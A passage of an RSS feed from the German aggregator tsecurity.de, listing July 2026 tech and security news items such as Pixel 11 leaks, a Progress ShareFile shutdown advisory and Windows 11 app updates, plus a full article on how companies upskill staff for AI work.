<description><![CDATA[You ready to see the entire Pixel 11 series of phones in a bunch of fun colors well before Google has officially revealed them? Thanks to what appears to be an insane screw-up by Amazon, we’re getting looks at the Pixel 11, Pixel 11 Pro, and Pixel 11 Pro Fold in several colors in likely-official....]]></description>
<link>https://tsecurity.de/de/3665782/it-nachrichten/heres-the-pixel-11-series-in-a-all-colors-prices-revealed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665782/it-nachrichten/heres-the-pixel-11-series-in-a-all-colors-prices-revealed/</guid>
<pubDate>Mon, 13 Jul 2026 18:05:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>You ready to see the entire Pixel 11 series of phones in a bunch of fun colors well before Google has officially revealed them? Thanks to what appears to be an insane screw-up by Amazon, we’re getting looks at the Pixel 11, Pixel 11 Pro, and Pixel 11 Pro Fold in several colors in likely-official...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/07/13/heres-the-pixel-11-series-in-a-all-colors-prices-revealed/">Here’s the Pixel 11 Series in a All Colors, Prices Revealed</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Progress Told ShareFile Customers to Pull the Plug on Their Servers. Here’s What We Know.]]></title>
<description><![CDATA[Progress urged ShareFile Storage Zone customers to shut down internet-facing servers immediately over a credible security threat under investigation. Progress Software sent an urgent email to ShareFile customers the evening of July 10 with a subject line that left no…
Read more →
The post Progres...]]></description>
<link>https://tsecurity.de/de/3663504/it-security-nachrichten/progress-told-sharefile-customers-to-pull-the-plug-on-their-servers-heres-what-we-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663504/it-security-nachrichten/progress-told-sharefile-customers-to-pull-the-plug-on-their-servers-heres-what-we-know/</guid>
<pubDate>Sun, 12 Jul 2026 17:23:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Progress urged ShareFile Storage Zone customers to shut down internet-facing servers immediately over a credible security threat under investigation. Progress Software sent an urgent email to ShareFile customers the evening of July 10 with a subject line that left no…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/progress-told-sharefile-customers-to-pull-the-plug-on-their-servers-heres-what-we-know/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/progress-told-sharefile-customers-to-pull-the-plug-on-their-servers-heres-what-we-know/">Progress Told ShareFile Customers to Pull the Plug on Their Servers. Here’s What We Know.</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mac Keyboard Setup Assistant Keeps Popping Up? Here’s the Fix]]></title>
<description><![CDATA[Some Mac users may encounter an unusual situation where a “Keyboard Setup Assistant” application opens at random on their Mac, even if they already connected and setup a keyboard to use with their computer. The Keyboard Setup Assistant might pop up completely randomly, when the computer is woken ...]]></description>
<link>https://tsecurity.de/de/3658278/ios-mac-os/mac-keyboard-setup-assistant-keeps-popping-up-heres-the-fix/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658278/ios-mac-os/mac-keyboard-setup-assistant-keeps-popping-up-heres-the-fix/</guid>
<pubDate>Thu, 09 Jul 2026 23:09:22 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Some Mac users may encounter an unusual situation where a “Keyboard Setup Assistant” application opens at random on their Mac, even if they already connected and setup a keyboard to use with their computer. The Keyboard Setup Assistant might pop up completely randomly, when the computer is woken from sleep, when the computer is freshly ... <a class="read-more" href="https://osxdaily.com/2026/07/09/mac-keyboard-setup-assistant-keeps-popping-up-heres-the-fix/">Read More</a></p>
<p>The post <a href="https://osxdaily.com/2026/07/09/mac-keyboard-setup-assistant-keeps-popping-up-heres-the-fix/">Mac Keyboard Setup Assistant Keeps Popping Up? Here’s the Fix</a> appeared first on <a href="https://osxdaily.com/">OS X Daily</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s 5 Bug Fixes for the Android 17 July Pixel Update]]></title>
<description><![CDATA[Google began pushing out the July Pixel update to its still-supported list of Pixel devices yesterday and it should be a most minor update. As you all know, the big Android 17 update landed last month, so this was expected to be a bug fixer that took care of an initial list of issues. The...
Read...]]></description>
<link>https://tsecurity.de/de/3654712/it-nachrichten/heres-5-bug-fixes-for-the-android-17-july-pixel-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654712/it-nachrichten/heres-5-bug-fixes-for-the-android-17-july-pixel-update/</guid>
<pubDate>Wed, 08 Jul 2026 17:03:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google began pushing out the July Pixel update to its still-supported list of Pixel devices yesterday and it should be a most minor update. As you all know, the big Android 17 update landed last month, so this was expected to be a bug fixer that took care of an initial list of issues. The...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/07/08/heres-5-bug-fixes-for-the-android-17-july-pixel-update/">Here’s 5 Bug Fixes for the Android 17 July Pixel Update</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The $50K-to-$5M Gap: Why Your SOC SLA Is Stuck in 2019 — Here’s the 2026 AI SLA Vendor Guide]]></title>
<description><![CDATA[A technical breakdown of why legacy MDR contract language fails in the age of AI-driven security operations — and the measurable standards that should replace it.  The Problem: Contracts Written for Human Queues  Pull out your current MDR contract and…
Read more →
The post The $50K-to-$5M Gap: Wh...]]></description>
<link>https://tsecurity.de/de/3652174/it-security-nachrichten/the-50k-to-5m-gap-why-your-soc-sla-is-stuck-in-2019-heres-the-2026-ai-slavendor-guide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652174/it-security-nachrichten/the-50k-to-5m-gap-why-your-soc-sla-is-stuck-in-2019-heres-the-2026-ai-slavendor-guide/</guid>
<pubDate>Tue, 07 Jul 2026 18:37:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A technical breakdown of why legacy MDR contract language fails in the age of AI-driven security operations — and the measurable standards that should replace it.  The Problem: Contracts Written for Human Queues  Pull out your current MDR contract and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-50k-to-5m-gap-why-your-soc-sla-is-stuck-in-2019-heres-the-2026-ai-sla-vendor-guide/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-50k-to-5m-gap-why-your-soc-sla-is-stuck-in-2019-heres-the-2026-ai-sla-vendor-guide/">The $50K-to-$5M Gap: Why Your SOC SLA Is Stuck in 2019 — Here’s the 2026 AI SLA Vendor Guide</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build or buy? Smart CIOs know the answer for AI talent]]></title>
<description><![CDATA[The key ingredient for successful AI deployment is largely becoming the talent available, not the AI tools installed, putting pressure on IT leaders to upskill their workforces.



With AI skills both the highest in demand and the hardest to hire for, many IT leaders and their C-suite colleagues ...]]></description>
<link>https://tsecurity.de/de/3651103/it-security-nachrichten/build-or-buy-smart-cios-know-the-answer-for-ai-talent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651103/it-security-nachrichten/build-or-buy-smart-cios-know-the-answer-for-ai-talent/</guid>
<pubDate>Tue, 07 Jul 2026 12:08:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The key ingredient for successful AI deployment is largely becoming the talent available, not the AI tools installed, putting pressure on IT leaders to upskill their workforces.</p>



<p>With AI skills both the <a href="https://www.cio.com/article/4096592/the-10-hottest-it-skills-for-2026.html">highest in demand</a> and <a href="https://www.cio.com/article/4184685/the-11-hardest-it-roles-to-fill-in-2026-and-whats-changed.html">the hardest to hire for</a>, many IT leaders and their C-suite colleagues are rolling out comprehensive <a href="https://www.cio.com/article/4100412/it-talent-heres-how-cios-curate-engagement-and-retention.html?utm=hybrid_search">AI training programs</a> for employees, both for the IT pros who build AI tools and the business users who will use them.</p>



<p>Smart companies will need to invest heavily in upskilling, says <a href="https://www.devry.edu/newsroom/administration/chris-campbell.html" rel="nofollow">Chris Campbell</a>, CIO at DeVry University. “The pace of change is simply too fast to rely solely on external hiring,” he says. “Organizations that develop AI capabilities across their existing workforce will have an advantage over those trying to win a bidding war for a relatively small pool of experts.”</p>



<p>Moreover, the key elements of what leads to a beneficial AI deployment has changed over time, he says.</p>



<p>“Early on, everyone was worried about access to AI tools,” Campbell adds. “Today, the tools are everywhere. What I see organizations struggling with is figuring out how to apply them to real business problems and integrate them into how work actually gets done.”</p>



<p>At DeVry, some of the strongest AI advocates don’t come from traditional AI backgrounds, but from software engineering, business analysis, cybersecurity, project management, and operations, he says.</p>



<p>“They understand the business, know where the friction points are, and can see where AI can create value,” he adds. “Those skills are often more important than deep expertise in a particular model or tool.”</p>



<p>Experienced <a href="https://www.cio.com/article/230935/hiring-the-most-in-demand-tech-jobs-for-2021.html">AI talent is difficult to find</a>, especially when IT leaders seek candidates who have successfully transitioned AI initiatives from experimentation to production.</p>



<p>“I don’t think every company needs to build a large team of AI specialists,” Campbell says. “In many cases, the people best positioned to drive AI adoption are already inside the organization.”</p>



<h2 class="wp-block-heading">Upskilling for an AI builder culture</h2>



<p>Professional services and accounting firm KPMG is addressing its AI talent challenge by providing widespread AI training to employees, says <a href="https://www.linkedin.com/in/rema-serafi/" rel="nofollow">Rema Serafi</a>, vice chairwoman for tax operations there. Many organizations’ major AI problem in 2026 is a lack of talent, not a lack of technology, she adds.</p>



<p>Forty percent of CIOs surveyed for this year’s <a href="https://us.resources.cio.com/resources/state-of-the-cio/" rel="nofollow">State of the CIO report</a> cited <a href="https://www.cio.com/article/4165232/whats-holding-back-enterprise-ai-shortage-of-talent-cios-say.html">lack of in-house talent as a top impediment</a> to implementing their AI strategies.</p>



<p>To address this, KPMG has piloted a six-week AI training program, with the goal of enabling all employees to deploy their own AI tools, Serafi says. The program familiarizes employees with Python and other technologies that serve as building blocks for internal AI tools, she says.</p>



<p>KPMG also revamped its team structures to ensure that three categories of employees — AI power users, makers, and builders — work closely together, says Serafi.</p>



<p>“Everyone’s going to have access to our tools, and everyone’s going to be a power user,” she says, “to the extent that those professionals who didn’t come in with AI capabilities, who didn’t come in as engineers or technologists, if they want to learn, we’re going to certify them to build tools as well.”</p>



<p>Deploying sophisticated, best-in-class AI tools without training employees is like buying an F1 racing car but not hiring a professional driver, she says.</p>



<p>“If we don’t have professionals who know how to use it, they’re not going to be able to maximize the benefit of what’s available to them,” Serafi adds.</p>



<p>KPMG commissioned a study with the University of Texas and found that employees who use AI regularly produce higher-quality work and feel less stressed. Employees who are expert users of AI will progress faster in their careers, she suggests. One challenge for training programs, though, is keeping up with how fast AI is evolving.</p>



<p>“The roles are actually changing in a short period of time,” she says. “When you used to see traditional engineers working with AI, now you see professionals who can actually guide, shape, and direct AI in their client work.”</p>



<h2 class="wp-block-heading">Retraining: ‘The only realistic path forward’</h2>



<p>Another fan of comprehensive AI training for employees is <a href="https://www.linkedin.com/in/elmerm/" rel="nofollow">Elmer Morales</a>, founder and CEO of agentic AI coding startup koder.com. Finding outside AI talent has become extremely difficult for most companies, he says.</p>



<p>“Retraining isn’t optional anymore,” he says. “It’s the only realistic path forward for most organizations. The external talent market can’t supply what every company simultaneously needs, and waiting for universities to catch up isn’t a strategy.”</p>



<p>Companies that succeed with AI treat upskilling as a core investment, not just an HR initiative, Morales adds.</p>



<p>“The talent gap is the single most concrete ceiling on AI ambition right now,” he says. “Companies can buy the best models, the best infrastructure, and the best tooling, and still produce nothing of value because they don’t have the people who know how to wire it all together into something that actually works in production.”</p>



<p>Morales suggests that IT leaders look to their existing engineering team to build AI deployment talent.</p>



<p>“The engineers already obsessed with this on nights and weekends, who are shipping personal projects and experimenting with new models, those people just need permission, resources, and a real problem to solve,” he says. “The best AI teams I’ve seen weren’t built by recruiting, but by creating the conditions for the right people to step forward.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Suricata Caught It. Zeek Explained It. Here’s Why You Need Both.]]></title>
<description><![CDATA[An alarm tells you something happened. A camera tells you the whole story. You need both running at once.Continue reading on InfoSec Write-ups »]]></description>
<link>https://tsecurity.de/de/3643711/hacking/suricata-caught-it-zeek-explained-it-heres-why-you-need-both/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643711/hacking/suricata-caught-it-zeek-explained-it-heres-why-you-need-both/</guid>
<pubDate>Fri, 03 Jul 2026 15:37:09 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://infosecwriteups.com/suricata-caught-it-zeek-explained-it-heres-why-you-need-both-3aef6c9f357f"><img src="https://cdn-images-1.medium.com/max/1536/1*pRLxITfdnyiVzKSlwt45qw.png" width="1536"></a></p><p class="medium-feed-snippet">An alarm tells you something happened. A camera tells you the whole story. You need both running at once.</p><p class="medium-feed-link"><a href="https://infosecwriteups.com/suricata-caught-it-zeek-explained-it-heres-why-you-need-both-3aef6c9f357f">Continue reading on InfoSec Write-ups »</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s Two Neat Changes in Android 17 QPR1 Beta 6]]></title>
<description><![CDATA[When Android 17 QPR1 Beta 6 dropped on our Pixel phones yesterday, you may have wondered if there was anything new. As the build hits Platform Stability and we anticipate a stable launch in the coming months, this isn’t typically a moment where shiny new objects appear for us to enjoy. Google did...]]></description>
<link>https://tsecurity.de/de/3641915/it-nachrichten/heres-two-neat-changes-in-android-17-qpr1-beta-6/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641915/it-nachrichten/heres-two-neat-changes-in-android-17-qpr1-beta-6/</guid>
<pubDate>Thu, 02 Jul 2026 19:33:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When Android 17 QPR1 Beta 6 dropped on our Pixel phones yesterday, you may have wondered if there was anything new. As the build hits Platform Stability and we anticipate a stable launch in the coming months, this isn’t typically a moment where shiny new objects appear for us to enjoy. Google did slide in...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/07/02/heres-two-neat-changes-in-android-17-qpr1-beta-6/">Here’s Two Neat Changes in Android 17 QPR1 Beta 6</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Käufer verlieren Zugriff auf gekaufte Inhalte im Playstation Store]]></title>
<description><![CDATA[Kunden in mehreren europäischen Ländern werden in Kürze keinen Zugriff mehr auf Filme haben, die sie über den Playstation Store erworben haben. Grund dafür ist das Auslaufen der Lizenzvereinbarung zwischen Sony und dem Filmstudio Studio Canal.



Laut Sony werden die betroffenen Filme am 1. Septe...]]></description>
<link>https://tsecurity.de/de/3638629/it-nachrichten/kaeufer-verlieren-zugriff-auf-gekaufte-inhalte-im-playstation-store/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638629/it-nachrichten/kaeufer-verlieren-zugriff-auf-gekaufte-inhalte-im-playstation-store/</guid>
<pubDate>Wed, 01 Jul 2026 15:17:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Kunden in mehreren europäischen Ländern werden in Kürze keinen Zugriff mehr auf Filme haben, die sie über den Playstation Store erworben haben. Grund dafür ist das Auslaufen der Lizenzvereinbarung zwischen Sony und dem Filmstudio Studio Canal.</p>



<p>Laut Sony werden die betroffenen Filme am 1. September aus den Videobibliotheken der Nutzer entfernt. Die Ankündigung betrifft unter anderem Kunden in Großbritannien, Frankreich, Italien und Spanien und umfasst Hunderte von Filmtiteln wie From Dusk Till Dawn. Augenscheinlich sind auch deutsche Kunden davon betroffen. Sony hat <a href="https://www.playstation.com/en-gb/legal/psvideocontent/">eine Liste aller betroffenen Titel</a> veröffentlicht.</p>



<p>Sony erwähnt keine Entschädigung oder Rückerstattung für betroffene Kunden, die den Zugriff auf die Inhalte verlieren. Sie müssen die Titel also auf einer anderen Plattform erneut kaufen, wenn Sie sie weiter ansehen möchten.</p>



<p><a href="https://www.engadget.com/2203232/heres-your-daily-reminder-that-you-dont-own-digital-content/">Engadget</a> berichtet, dass sich die Situation noch vor September ändern könnte. Ein ähnlicher Fall ereignete sich im Jahr 2023, als Discovery-Inhalte aus dem Playstation Store entfernt werden sollten, jedoch nach dem Abschluss eines neuen Lizenzvertrags doch noch verfügbar blieben.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta Adds WhatsApp Usernames: Here’s What You Need to Know]]></title>
<description><![CDATA[WhatsApp is rolling out usernames so people can chat without sharing phone numbers. Here’s how reservations, username keys, and rules work. The post Meta Adds WhatsApp Usernames: Here’s What You Need to Know appeared first on TechRepublic. This article has…
Read more →
The post Meta Adds WhatsApp...]]></description>
<link>https://tsecurity.de/de/3637015/it-security-nachrichten/meta-adds-whatsapp-usernames-heres-what-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637015/it-security-nachrichten/meta-adds-whatsapp-usernames-heres-what-you-need-to-know/</guid>
<pubDate>Wed, 01 Jul 2026 00:37:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>WhatsApp is rolling out usernames so people can chat without sharing phone numbers. Here’s how reservations, username keys, and rules work. The post Meta Adds WhatsApp Usernames: Here’s What You Need to Know appeared first on TechRepublic. This article has…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/meta-adds-whatsapp-usernames-heres-what-you-need-to-know/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/meta-adds-whatsapp-usernames-heres-what-you-need-to-know/">Meta Adds WhatsApp Usernames: Here’s What You Need to Know</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here's the most played Steam Deck games for June 2026]]></title>
<description><![CDATA[Another month comes to a close - here's what has been most popular on the Steam Deck with the top 50 most played games.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3636250/linux-tipps/heres-the-most-played-steam-deck-games-for-june-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636250/linux-tipps/heres-the-most-played-steam-deck-games-for-june-2026/</guid>
<pubDate>Tue, 30 Jun 2026 18:26:25 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Another month comes to a close - here's what has been most popular on the Steam Deck with the top 50 most played games.<p><img src="https://www.gamingonlinux.com/uploads/tagline_gallery/steam-deck-top-50_gol2_29cdfa89.webp" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/06/heres-the-most-played-steam-deck-games-for-june-2026/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Update 510: Live From Mallorca with Scott Helme]]></title>
<description><![CDATA[How's the view?! Back to business, it's now 8 years ago that Scott and I thought it would be a cool idea to build Why no HTTPS? We used the site to shame companies for not implementing their transport later security property, and to make it]]></description>
<link>https://tsecurity.de/de/3636165/it-security-nachrichten/weekly-update-510-live-from-mallorca-with-scott-helme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636165/it-security-nachrichten/weekly-update-510-live-from-mallorca-with-scott-helme/</guid>
<pubDate>Tue, 30 Jun 2026 18:08:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>How's the view?! Back to business, it's now 8 years ago that Scott and I thought it would be a cool idea to build <a href="https://www.troyhunt.com/why-no-https-heres-the-worlds-largest-websites-not-redirecting-insecure-requests/" rel="noreferrer">Why no HTTPS?</a> We used the site to shame companies for not implementing their transport later security property, and to make it</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Built a SOC Lab From Scratch. Here’s What Broke First.]]></title>
<description><![CDATA[Forty five minutes lost to a network setting taught me more about SOC work than any course did.Continue reading on InfoSec Write-ups »]]></description>
<link>https://tsecurity.de/de/3631993/hacking/i-built-a-soc-lab-from-scratch-heres-what-broke-first/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631993/hacking/i-built-a-soc-lab-from-scratch-heres-what-broke-first/</guid>
<pubDate>Mon, 29 Jun 2026 07:24:25 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://infosecwriteups.com/i-built-a-soc-lab-from-scratch-heres-what-broke-first-8f0863cc6169"><img src="https://cdn-images-1.medium.com/max/975/1*Jqz9N3w3SsqjbdhRqfwWaA.png" width="975"></a></p><p class="medium-feed-snippet">Forty five minutes lost to a network setting taught me more about SOC work than any course did.</p><p class="medium-feed-link"><a href="https://infosecwriteups.com/i-built-a-soc-lab-from-scratch-heres-what-broke-first-8f0863cc6169">Continue reading on InfoSec Write-ups »</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft aktualisiert diese wichtigen Apps in Windows 11]]></title>
<description><![CDATA[Microsoft hat eine Vorabversion des nächsten Windows-Updates für Mitglieder des Windows-Insider-Programms bereitgestellt. Dieses Mal werden Updates für zahlreiche vorinstallierte Apps bereitgestellt, nämlich für den Taschenrechner, Fotos, den Audio-Recorder, Paint, den Media Player, die Kamera, N...]]></description>
<link>https://tsecurity.de/de/3626501/it-nachrichten/microsoft-aktualisiert-diese-wichtigen-apps-in-windows-11/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626501/it-nachrichten/microsoft-aktualisiert-diese-wichtigen-apps-in-windows-11/</guid>
<pubDate>Fri, 26 Jun 2026 08:46:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft hat eine Vorabversion des nächsten Windows-Updates für Mitglieder des Windows-Insider-Programms bereitgestellt. Dieses Mal werden Updates für zahlreiche vorinstallierte Apps bereitgestellt, nämlich für den <a href="https://learn.microsoft.com/en-us/windows-insider/release-notes/apps/calculator">Taschenrechner</a>, <a href="https://learn.microsoft.com/en-us/windows-insider/release-notes/apps/photos">Fotos</a>, den <a href="https://learn.microsoft.com/en-us/windows-insider/release-notes/apps/sound-recorder">Audio-Recorder,</a> <a href="https://learn.microsoft.com/en-us/windows-insider/release-notes/apps/paint">Paint</a>, den <a href="https://learn.microsoft.com/en-us/windows-insider/release-notes/apps/media-player">Media Player,</a> die <a href="https://learn.microsoft.com/en-us/windows-insider/release-notes/apps/camera">Kamera</a>, <a href="https://learn.microsoft.com/en-us/windows-insider/release-notes/apps/notepad">Notepad</a> und die <a href="https://learn.microsoft.com/en-us/windows-insider/release-notes/apps/clock">Uhr</a>.</p>



<p>Auch wenn jedes einzelne Update für sich genommen nicht spektakulär ist, sorgen alle Verbesserungen zusammen dafür, dass Windows wieder ein Stückchen besser wird. Nehmen wir als Beispiel den <strong>Taschenrechner</strong>. Dafür nennt Microsoft diese Verbesserungen:</p>



<ul class="wp-block-list">
<li>Genauere Ergebnisse bei Quadratwurzelberechnungen — Es wurden seltene Fälle behoben, in denen eine Berechnung, die eigentlich Null ergeben sollte, stattdessen einen winzigen Restwert lieferte.</li>



<li>Lesbarer Text in kontrastreichen Designs — Der Text in den Einstellungen wird jetzt in den kontrastreichen Designs „Aquatic“ und „Desert“ in den richtigen Farben angezeigt.</li>



<li>Korrektes Layout für Sprachen mit Schreibrichtung von rechts nach links — Bei Sprachen wie Arabisch und Hebräisch werden das Diagramm, der Ziffernblock, die Gleichungsfelder und die Scroll-Schaltflächen nun in der richtigen Ausrichtung angezeigt.</li>



<li>Zuverlässiger Start nach dem Upgrade — Es wurde ein Problem behoben, bei dem nach einem Upgrade von deutlich älteren Versionen veraltete Einstellungen zurückblieben, die das Öffnen der App verhinderten.</li>
</ul>



<p>Und für den <strong>Audio-Rekorder</strong> nennt das Changelog diese Verbesserungen:</p>



<ul class="wp-block-list">
<li>Wellenformanzeige bei Bluetooth-Mikrofonen — Die Live-Wellenform wird nun korrekt angezeigt, wenn Sie mit einem Bluetooth-Audiogerät aufnehmen.</li>



<li>Keine störende Bildlaufleiste mehr — Eine nicht funktionierende horizontale Bildlaufleiste erscheint nicht mehr am unteren Rand der Wellenform, es sei denn, Sie haben die Ansicht vergrößert.</li>



<li>“Markieren“-Schaltfläche sofort verfügbar — Die Schaltfläche „Markieren“ erscheint nach dem Öffnen der App nicht mehr ausgegraut, bis Sie mit der Maus darüber fahren.</li>



<li>Markierungen für WAV-Dateien ausgeblendet — Markierungen sind nun für WAV-Aufnahmen deaktiviert, da dieses Format sie nicht speichern kann – so gehen sie nicht mehr unbemerkt verloren.</li>



<li>Reibungsloseres Löschen — Das schnelle Drücken von „Entf“ und „Enter“, um mehrere Aufnahmen hintereinander zu löschen, löst nun keinen Fehler „Datei existiert nicht“ mehr aus.</li>



<li>Speicherproblem behoben — Ein Speicherleck, das bei jedem Start einer Aufnahme auftrat, wurde behoben.</li>
</ul>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<p>Berichten zufolge hat Microsoft unter anderem Wasserzeichen in KI-generierte Bilder sowie einen Zoomregler in der Kamera-App hinzugefügt. Außerdem ist es jetzt möglich, die Untertitel im Media Player anzupassen und die Weckfunktion um 15 Minuten zu verschieben.</p>



<p>Eine detailliertere Übersicht über alle Neuerungen in den vorinstallierten Apps finden Sie auf der Website <a href="https://www.windowslatest.com/2026/06/25/8-inbox-windows-11-apps-are-getting-a-major-update-heres-a-closer-look/" data-type="link" data-id="https://www.windowslatest.com/2026/06/25/8-inbox-windows-11-apps-are-getting-a-major-update-heres-a-closer-look/">Windows Latest</a>.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Steam Summer Sale 2026 is live - here's our budget recommendations]]></title>
<description><![CDATA[The great big sale event of the hot season has landed, the Steam Summer Sale 2026 is live now with masses of games featuring big discounts.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3625489/linux-tipps/steam-summer-sale-2026-is-live-heres-our-budget-recommendations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625489/linux-tipps/steam-summer-sale-2026-is-live-heres-our-budget-recommendations/</guid>
<pubDate>Thu, 25 Jun 2026 19:39:55 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The great big sale event of the hot season has landed, the Steam Summer Sale 2026 is live now with masses of games featuring big discounts.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/1645728204id29282gol.webp" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/06/steam-summer-sale-2026-is-live-heres-our-budget-recommendations/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[One Month Into Learning Data Engineering in Public: Here’s What I Didn’t Write About]]></title>
<description><![CDATA[A reflection on the first month of learning data engineering in public, and what actually kept me going.
The post One Month Into Learning Data Engineering in Public: Here’s What I Didn’t Write About appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3624429/ai-nachrichten/one-month-into-learning-data-engineering-in-public-heres-what-i-didnt-write-about/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624429/ai-nachrichten/one-month-into-learning-data-engineering-in-public-heres-what-i-didnt-write-about/</guid>
<pubDate>Thu, 25 Jun 2026 14:03:36 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A reflection on the first month of learning data engineering in public, and what actually kept me going.</p>
<p>The post <a href="https://towardsdatascience.com/one-month-into-learning-data-engineering-in-public-heres-what-i-didnt-write-about/">One Month Into Learning Data Engineering in Public: Here’s What I Didn’t Write About</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[8 inbox Windows 11 apps are getting a major update, here’s a closer look]]></title>
<description><![CDATA[Microsoft's latest Windows 11 Insider flight updates eight in-box apps, adding a continuous zoom slider and native QR scanning to Camera, AI watermarking controls in Photos, a counting-up timer in Clock, eraser transparency in Paint, and a faster Notepad with Find/Replace fixes.
The post 8 inbox ...]]></description>
<link>https://tsecurity.de/de/3623402/windows-tipps/8-inbox-windows-11-apps-are-getting-a-major-update-heres-a-closer-look/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623402/windows-tipps/8-inbox-windows-11-apps-are-getting-a-major-update-heres-a-closer-look/</guid>
